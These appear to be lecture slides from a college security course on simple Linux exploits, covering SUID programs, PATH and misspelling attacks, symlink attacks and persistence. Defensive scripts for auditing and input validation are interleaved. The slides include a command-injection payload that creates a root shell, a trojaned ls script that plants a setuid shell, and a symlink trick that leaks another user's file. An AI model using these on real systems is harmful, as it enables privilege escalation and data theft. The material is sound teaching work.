Simple Exploits
Thursday/Monday, October 16/20, 2014
Reading: Hacking Linux Exposed
CS342 Computer Security
Department of Computer Science
Wellesley College

What do Hackers Want?
o Your data: credit card number, financial information, SSN, personal information.
o Your disk: pirated software (warez), illegal copies of movies/videos, porn, ...
o Your CPU (e.g. to crack passwords)
o Your bandwidth: send spam, participate in botnet, stepping stone to other attacks.
o To deny resources to you or your customers: for blackmail, competition, revenge.
o ⇒ To own (pwn)/root your machine (or at least your account) by exploiting vulnerabilities.
Simple Exploits 12-2
Overview
Goal: discuss typical vulnerabilities & exploits in Linux.
Understand these for PS4 Treasure Hunt problem!
o elevation of privilege
o password exploits
o incorrectly set permissions
o leveraging SUID/SGID programs
o code injection
o trojaned commands
o PATH exploits
o misspelling exploit
o symbolic link exploits
o document exploits
o backdoor rootshells
Simple Exploits 12-3

Essence of Exploits
o Study details/assumptions of system
o Take advantage of details and violate assumptions! (recall the Hacker Curriculum and Security Mindset).
o US Postal System examples (Note: do not try these!)
• Can you send a letter without a stamp?
• Can you reuse a stamp?
Simple Exploits 12-4
Elevation of Privilege
Holy grail = rootshell, but the path there may be circuitous.
Also, may only need to get partially there.
[Figure: ladder of privilege levels, bottom to top: guest, student, faculty, sysadmin, root]
Simple Exploits 12-5

Password Exploits
If I know your password, I can be you on your computer.
o Watch for passwords "sent in the clear" on network (especially wireless)
o Find passwords stored unprotected on computer, perhaps in public files, emails, code, comments, logs, .bash_history, etc. The permissions on some of these files might be set incorrectly.
o Online password guessing (perhaps using knowledge of victim).
o Offline password cracking (e.g. John the Ripper) -- must be able to read password file.
o Use passwords from keystroke logger
o Social engineering: shoulder surfing, trick people to divulge passwords, look at postits near computer, dumpster diving
Simple Exploits 12-6
.bash_history file
wendy@cs342-ubuntu-1:~$ cat ~/.bash_history
sudo emacs
su - guest
su - foo
sudo emacs &
wendy@cs342-ubuntu-1:~$ ls -al ~/.bash_history
-rw------- 1 wendy wendy 68 Sep 16 08:59 /home/wendy/.bash_history
o Permissions are sometimes incorrectly set, so others can view this file.
o Sometimes contains information valuable for attacker (e.g., passwords typed "out of phase")
o Sometimes contains forensic information for understanding an attack.
Simple Exploits 12-7

Use the source, Luke!
Try to find and study the source code for potentially vulnerable programs:
o In code, may find vulnerabilities like overflowable buffers, overflowable numbers, code injection, hardwired accounts and passwords, etc.
o In comments, may find notes on potential vulnerabilities, passwords, etc.
Simple Exploits 12-8
SUID and SGID Program Attacks
o Use Linux find command to find all accessible SUID and SGID programs – prime targets for privilege escalation.
o Find source code for these programs to look for vulnerabilities.
o Disassemble and study object code.
o Use strace to study system calls made (don't forget -f flag)
o Use Linux strings command to see strings in object code (e.g. prompts, help messages, error messages, system functions linked to, etc.)
o Experiment with SUID/SGID programs to find & exploit vulnerabilities:
• Use gleaned knowledge to craft diabolical inputs (for buffer overflows, code injection, etc.)
• Try boundary case and out-of-range inputs (e.g., negative numbers, large numbers, empty string, very long strings)
Simple Exploits 12-9

Simple SUID Example: mycat
o User lynux creates a secret file
[lynux@salmon exploits]$ echo "This is lynux's secret file" > secret.txt
[lynux@salmon exploits]$ chmod 750 secret.txt
o To test SUID programs, user lynux makes an SUID copy of cat named mycat. Forgets to change permissions back.
[lynux@salmon exploits]$ which cat
/bin/cat
[lynux@salmon exploits]$ cp /bin/cat mycat; chmod u+s mycat; ls -l mycat
-rwsr-xr-x. 1 lynux lynux 48040 Sep 25 15:39 mycat
o Attacker gdome uses mycat to read lynux's secret file
[gdome@salmon exploits]$ cat secret.txt
cat: secret.txt: Permission denied
[gdome@salmon exploits]$ ./mycat secret.txt
This is lynux's secret file
Simple Exploits 12-10
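The first bullet above says to use find to locate SUID/SGID programs; the defender's version of that is an audit that notices when a new one appears, such as the mycat copy. The script below is an added example, not from the slides: it lists SUID/SGID files under a directory and diffs them against a saved baseline (the baseline path in the comment is an assumption).

```shell
#!/bin/sh
# Added example (not from the slides): list SUID/SGID files below a directory
# and diff them against a saved baseline, so a setuid copy like the mycat or
# /tmp/foo shells in the slides shows up.  Needs only POSIX sh and find.

# list_suid ROOT: print every regular file under ROOT whose setuid (4000) or
# setgid (2000) bit is set, one path per line, sorted.
list_suid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# is_setuid_mode MODE: given the permission field printed by ls -l
# (e.g. -rwsr-xr-x, possibly with a trailing '.' for an SELinux label),
# return 0 when the setuid bit is set: an 's' or 'S' in the owner-execute
# position (4th character).
is_setuid_mode() {
    case "$1" in
        ???[sS]??????*) return 0 ;;
        *)              return 1 ;;
    esac
}

# audit_suid ROOT BASELINE: print every SUID/SGID path under ROOT that is
# not listed in BASELINE and return 1 if there was at least one; return 0
# when nothing new appeared.  A missing BASELINE means everything is new.
audit_suid() {
    root=$1; baseline=$2
    new=$(list_suid "$root" | while IFS= read -r path; do
        [ -f "$baseline" ] && grep -qxF -- "$path" "$baseline" && continue
        printf '%s\n' "$path"
    done)
    [ -n "$new" ] || return 0
    printf '%s\n' "$new"
    return 1
}

# Typical use (the baseline path is an assumption): record a baseline on a
# known-good system, then re-run from cron and alert on any output.
#   list_suid / > /var/lib/suid-baseline
#   audit_suid / /var/lib/suid-baseline || echo "new SUID/SGID files found"
```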
Another SUID Example
o User lynux writes SUID program ~/bin/submit username psetfile to submit student pset data files to ~/psets/username/psetfile.
o The code for submit is essentially
write the contents of psetfile to the file whose name is the concatenation ~/psets/ + username + / + psetfile
o What kind of attacks can be made with this program?
Simple Exploits 12-11

Code Injection Exploits
Bad guys can take advantage of shoddy input handling to execute arbitrary code as someone else.
o Filename mangling from previous example.
o Inject Linux commands into C programs that execute strings constructed from user input.
o Inject HTML and JavaScript into web pages that include user input in page (e.g., original Tanner photo contest site).
o Inject database commands into SQL programs: e.g., xkcd's "Exploits of a Mom": http://xkcd.com/327/
Simple Exploits 12-12
Code Injection: newpasswd Example
Suppose root tries to make command-line passwords (only available to root) available to everyone via a setuid script:
#!/bin/bash -p
# contents of /root/newpasswd.sh
echo "Executing /root/newpasswd.sh"
echo $1 | /usr/bin/passwd --stdin `whoami`
o In raw C, can use system to execute string argument in a shell:
system("echo $1 | /usr/bin/passwd --stdin `whoami`")
o Other ways to construct and execute code out of parts on the fly:
• C's exec, execv, and execve
• eval in JavaScript, Python, PHP, Perl, and Lisp
o This code won't really work anyway because /usr/bin/passwd only allows the --stdin option for real UID root, not for effective UID root. But let's suppose root doesn't know this.
o Ubuntu doesn't support --stdin option (but some other Linuxes do)
Simple Exploits 12-13

Code Injection: newpasswd Example part 2
Next, the machinations to make newpasswd setuid:
// Contents of /root/newpasswd.c
#include <unistd.h>
int main (int argc, char* argv[]) {
    // Hand the caller's arguments straight to the setuid-root script.
    execv("/root/newpasswd.sh", argv);
}
[root@localhost ~]# gcc -o newpasswd newpasswd.c
[root@localhost ~]# cp newpasswd /usr/bin/newpasswd
[root@localhost ~]# chmod 4755 /usr/bin/newpasswd
[root@localhost ~]$ ls -l /usr/bin/newpasswd
-rwsr-xr-x 1 root root 4832 2008-09-23 06:16 /usr/bin/newpasswd
Simple Exploits 12-14
Code Injection: newpasswd Example part 3
Now gdome tries out newpasswd:
[gdome@localhost ~]$ newpasswd foobar
Executing /root/newpasswd.sh
Only root can do that.
The underlying /usr/bin/passwd fails because real UID gdome != root.
But gdome can still do sneaky things!
[gdome@localhost ~]$ newpasswd "foo; echo bar; echo baz"
Executing /root/newpasswd.sh
foo
bar
Only root can do that.
Simple Exploits 12-15

Code Injection: newpasswd Example part 4
[gdome@localhost ~]$ newpasswd "foo; cp /bin/bash ~gdome/mine; chmod 4755 ~gdome/mine; echo bar"
Executing /root/newpasswd.sh
foo
Only root can do that.
[gdome@localhost ~]$ ls -l mine
-rwsr-xr-x 1 root gdome 735004 2008-09-23 06:04 mine
[gdome@localhost ~]$ ./mine -p
mine-3.2# whoami
root
Simple Exploits 12-16
Preventing Code Injection Exploits
o Don't directly execute input or embed it in system contexts (like filenames).
o If you must use user input directly, first either
• Verify that input doesn't contain problematic parts:
! semicolons in Linux commands
! .. or starting / in filenames
! unmatched string quotes, angle brackets (HTML), parens (Javascript)
! Code fragments (HTML, Javascript, …)
• Sanitize input to remove problematic parts.
Simple Exploits 12-17

Trojaned ls program
#!/bin/bash
# gdome's ~/bin/ls_trojan program
# Make suid shell in /tmp/foo
cp /bin/bash /tmp/foo
chmod 4755 /tmp/foo
# Now do what ls does
exec ls "$@"
Now gdome tries to trick other users into running her ls program in place of regular ls.
Path attacks are one way to do this.
Simple Exploits 12-18
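As an added example (not code from the slides), here is the "verify first" approach applied to the submit program from slide 12-11: each of username and psetfile is checked against an allowlist before the ~/psets path is built, and the file is copied with cp taking the path as an argument rather than through a shell string. The psets root directory is an assumption.

```shell
#!/bin/sh
# Added example (not from the slides): validating the username and psetfile
# arguments of a submit-style setuid helper before building the path
# PSETS_ROOT/USERNAME/PSETFILE, and never handing the arguments to a shell.
# POSIX sh; the default psets root below is an assumption.

PSETS_ROOT=${PSETS_ROOT:-/home/grader/psets}   # assumed location

# valid_component NAME: accept a single path component made only of
# letters, digits, '.', '_' and '-', that is not empty, not "." or "..",
# and does not start with '-' (so it cannot be taken as an option).
# Returns 0 if acceptable, 1 otherwise.
valid_component() {
    case "$1" in
        ''|.|..|-*)          return 1 ;;  # empty, dot dirs, option-like
        *[!A-Za-z0-9._-]*)   return 1 ;;  # anything outside the allowlist:
                                          # '/', ';', quotes, spaces, newlines
        *)                   return 0 ;;
    esac
}

# submit_path USERNAME PSETFILE: print the destination path only if both
# components pass validation; otherwise print nothing and return 1.
# Because each piece is checked, "../../etc/passwd" or "a; rm -rf ~" can
# never reach the filesystem or a shell.
submit_path() {
    valid_component "$1" && valid_component "$2" || return 1
    printf '%s/%s/%s\n' "$PSETS_ROOT" "$1" "$2"
}

# submit USERNAME PSETFILE: copy PSETFILE from the current directory to the
# validated destination.  cp receives the path as a plain argument, never as
# text interpolated into a command line, so there is nothing to inject into.
submit() {
    dest=$(submit_path "$1" "$2") ||
        { echo "submit: bad username or filename" >&2; return 1; }
    [ -d "$PSETS_ROOT/$1" ] ||
        { echo "submit: no such student directory" >&2; return 1; }
    cp -- "$2" "$dest"
}
```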
Linux PATH variable: Prelude to An Exploit
Linux uses PATH variable to find executables. (This variable is set/changed in ~/.bash_profile, ~/.bashrc)
[lynux@localhost ~]$ echo $PATH
/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin:.
Linux searches PATH in order to find an executable for a relative (non-absolute) pathname. Can see what it finds with which command.
[lynux@localhost ~]$ which passwd
/usr/bin/passwd
[lynux@localhost ~]$ which ls
/bin/ls
[lynux@localhost ~]$ which findit
~/bin/findit
[lynux@localhost ~]$ which rootshell
/usr/bin/which: no rootshell in (/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin:.)
[lynux@localhost ~]$ cd ~/cs342/download/setuid/
[lynux@localhost setuid]$ which rootshell
./rootshell
Simple Exploits 12-19

Overriding PATH with Absolute Pathnames
Can override PATH mechanism by giving absolute pathname
[lynux@localhost ~]$ which ~/bin/passwd
~/bin/passwd
[gdome@localhost setuid]$ echo $PATH
/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/home/gdome/bin
[gdome@localhost setuid]$ which rootshell
/usr/bin/which: no rootshell in (/usr/kerberos/bin:/usr/local/bin:/bin:/usr/bin:/home/gdome/bin)
[gdome@localhost setuid]$ which ./rootshell
./rootshell
Simple Exploits 12-20
Linux Path Exploit: PATH begins with .
Suppose "." is at the beginning of PATH:
[lynux@localhost ~]$ export PATH=.:$PATH; echo $PATH
.:/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:.:/home/lynux/bin
Nefarious gdome can trick lynux into running her trojaned ls program:
[gdome@localhost ~]$ cp ~/bin/ls_trojan ~/public_html/ls
[lynux@localhost ~]$ cd ~gdome/public_html/; ls -l index.html
-rwxrwxr-x 1 gdome gdome 34 2008-09-16 05:09 index.html
[gdome@localhost ~]$ ls -al /tmp/foo
-rwsr-xr-x 1 lynux lynux 735004 2008-09-19 07:47 /tmp/foo
[gdome@localhost ~]$ /tmp/foo -p
foo-3.2$ whoami
lynux
Simple Exploits 12-21

Avoiding Linux Path Exploit
Can avoid the above attack by putting "." at end of PATH or excluding it altogether.
... lynux in a new shell after moving . to end of PATH ...
[lynux@localhost ~]$ echo $PATH
/usr/kerberos/bin:/usr/local/bin:/usr/bin:/bin:/home/lynux/bin:.
[lynux@localhost ~]$ cd ~gdome/public_html/
[lynux@localhost public_html]$ which ls
/bin/ls
Simple Exploits 12-22
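The slide above fixes the problem by hand; as an added example (not from the slides), the functions below check a PATH string for the entries that make the "." attack and the misspelling variant on the next slide possible (empty, ".", relative, or group/world-writable directories) and produce a cleaned PATH that drops "." altogether, which is the "excluding it" option the slide mentions.

```shell
#!/bin/sh
# Added example (not from the slides): find the PATH entries that make the
# "." and misspelling tricks work, and build a cleaned PATH without them.
# POSIX sh; only the writability check consults the filesystem.

# path_problems PATHSTRING: print one line per risky entry and return 1 if
# any were found, 0 if PATH is clean.  Risky: an empty component (leading or
# trailing ':' or '::', which the shell searches as the current directory),
# '.', any other relative directory, and an existing directory that group or
# others can write to (anyone could drop a trojaned 'ls' or 'sl' there).
path_problems() {
    found=0
    rest="$1:"                      # trailing ':' so the last entry is seen
    while [ -n "$rest" ]; do
        entry=${rest%%:*}; rest=${rest#*:}
        case "$entry" in
            '') echo "empty entry (searched as '.')"; found=1 ;;
            .)  echo "'.' entry"; found=1 ;;
            /*) if [ -d "$entry" ] && find "$entry" -maxdepth 0 \
                       \( -perm -g+w -o -perm -o+w \) | grep -q .; then
                    echo "writable by other users: $entry"; found=1
                fi ;;
            *)  echo "relative entry: $entry"; found=1 ;;
        esac
    done
    return $found
}

# clean_path PATHSTRING: print PATHSTRING with empty, '.' and relative
# entries dropped, keeping the absolute entries in their original order.
clean_path() {
    out=""; rest="$1:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}; rest=${rest#*:}
        case "$entry" in
            /*) out="${out:+$out:}$entry" ;;
        esac
    done
    printf '%s\n' "$out"
}

# Check the live PATH of this shell and, if it is risky, replace it:
#   path_problems "$PATH" || PATH=$(clean_path "$PATH"); export PATH
```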
Misspelling Exploit
Even if "." at end of PATH, still subject to misspelling attacks.
[gdome@localhost ~]$ cp ~/bin/ls_trojan ~/public_html/sl
Then can still have trouble if lynux mistypes "ls" as "sl":
[lynux@localhost ~]$ cd ~gdome/public_html/; sl -l index.html
-rwxrwxr-x 1 gdome gdome 34 2008-09-16 05:09 index.html
(Or: could modify sl to print "bash: sl: command not found")
[gdome@localhost ~]$ ls -al /tmp/foo
-rwsr-xr-x 1 lynux lynux 735004 2008-09-19 07:47 /tmp/foo
[gdome@localhost ~]$ /tmp/foo -p
foo-3.2$ whoami
lynux
Simple Exploits 12-23

Symbolic Links in Linux
Make "aliases" in Linux via symbolic links: ln -s oldname newname
[lynux@localhost ~]$ cd ~/bin
[lynux@localhost bin]$ ln -s /usr/java/jdk1.6.0_06/bin/java java1.6
[lynux@localhost ~]$ cd ~
[lynux@localhost ~]$ which java1.6
~/bin/java1.6
[lynux@localhost ~]$ java1.6 -version
java version "1.6.0_06"
Java(TM) SE Runtime Environment (build 1.6.0_06-b02)
Java HotSpot(TM) Client VM (build 10.0-b22, mixed mode, sharing)
Simple Exploits 12-24
Symbolic Link Exploit: Part 1
Could anything go wrong with the following?
[lynux@localhost ~]$ cat personal.txt
My credit card number is 1234 5678 1011 1213
[lynux@localhost ~]$ cp personal.txt ~/tmp/saved
... lynux does some other operations ...
[lynux@localhost ~]$ cp ~/tmp/saved personal.txt
[lynux@localhost ~]$ rm ~/tmp/saved
Suppose the permissions on tmp are:
[lynux@localhost ~]$ ls -al tmp
total 48
drwxrwxr-x 2 lynux cs342stu 4096 2008-09-19 08:57 .
…
Simple Exploits 12-25

Symbolic Link Exploit: Part 2
Suppose gdome did the following *before* lynux's operations:
[gdome@localhost ~]$ touch lynsecret
[gdome@localhost ~]$ chmod 777 lynsecret
[gdome@localhost ~]$ cd ~lynux/tmp
[gdome@localhost tmp]$ ln -s /home/gdome/lynsecret saved
Then gdome now knows lynux's secret after lynux's operations!
[gdome@localhost tmp]$ cat ~/lynsecret
My credit card number is 1234 5678 1011 1213
This trick can be used to access files written by root to system /tmp directory!
How to avoid this attack?
Simple Exploits 12-26
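One answer to "How to avoid this attack?", as an added example that is not part of the slides: a save routine that refuses each condition the trick relies on, namely a destination that is a symbolic link, a destination directory (like the group-writable tmp above) that other users can modify, and an existing target that is not a regular file owned by the caller. The function and file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the slides): a save routine that refuses the
# conditions the symlink trick depends on.  It will not write through a
# symbolic link, will not write into a directory other users can modify,
# and creates a new destination itself with mode 600.  POSIX sh.

# dir_writable_by_others DIR: return 0 if DIR has the group- or other-write
# bit (so another user, e.g. anyone in group cs342stu, could plant a
# symlink there), 1 otherwise.
dir_writable_by_others() {
    find "$1" -maxdepth 0 \( -perm -g+w -o -perm -o+w \) | grep -q .
}

# safe_save SRC DEST: copy SRC to DEST only if it is safe to do so.
# Prints a reason on stderr and returns 1 when refusing.
safe_save() {
    src=$1; dest=$2; dir=$(dirname "$dest")
    if [ -L "$dest" ]; then
        echo "refusing: $dest is a symbolic link" >&2; return 1
    fi
    if dir_writable_by_others "$dir"; then
        echo "refusing: $dir can be modified by other users" >&2; return 1
    fi
    if [ -e "$dest" ]; then
        # Existing target: only overwrite a regular file that we own.
        { [ -f "$dest" ] && [ -O "$dest" ]; } ||
            { echo "refusing: $dest is not a regular file we own" >&2; return 1; }
    else
        # New target: create it ourselves with mode 600.  noclobber (-C) makes
        # '>' fail if something appeared at DEST between the check and the
        # write, which narrows the race window; closing it completely needs
        # open(2) with O_CREAT|O_EXCL|O_NOFOLLOW, which the shell cannot express.
        ( umask 077; set -C; : > "$dest" ) 2>/dev/null ||
            { echo "refusing: $dest appeared before it could be created" >&2; return 1; }
    fi
    cat -- "$src" > "$dest"
}
```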
Maintaining Access (HLE Ch. 10)
Once a hacker has rooted your machine, what can they do to maintain access for the future?
o Leave behind "backdoor" rootshells
o Install Trojaned system programs. E.g.:
• change passwd, sudo, etc. to record passwords & send to attacker.
• make more/cat setuid/setgid to allow reading of any file.
• change safe program to be vulnerable to a code injection attack, buffer overflow attack, etc.
• install keystroke logger (keylogger)
• many such Trojaned binaries often bundled into rootkits that hide their existence by changing basic commands like ls, ps.
o Change system configuration files, e.g.,
• hosts.allow & hosts.deny: control which clients are allowed to connect to a machine.
• httpd.conf: configures HTTP server, including various security settings.
Simple Exploits 12-27

Document Exploits
o Examine metadata, comments, change-tracking records of MS Word doc.
o In redacted documents, look for redacted elements.
o Remove saving/printing restrictions from PDF document.
o Examine metadata in images/video (time, possibly location, …)
o Digital watermarks on documents and images.
o For more details, see:
• S&M Ch. 13 Office Tools and Security
• Abelson, Ledeen, & Lewis, Blown To Bits, Ch. 4: Ghosts in the Machine – Secrets and Surprises of Electronic Documents.
Simple Exploits 12-28
Other Attacks We'll Study
o Buffer overflow attacks
o Format string attacks
o Cross-site scripting
o Drive-by downloads
o Network attacks
o Malware: viruses, worms, Trojans, rootkits, spyware
Simple Exploits 12-29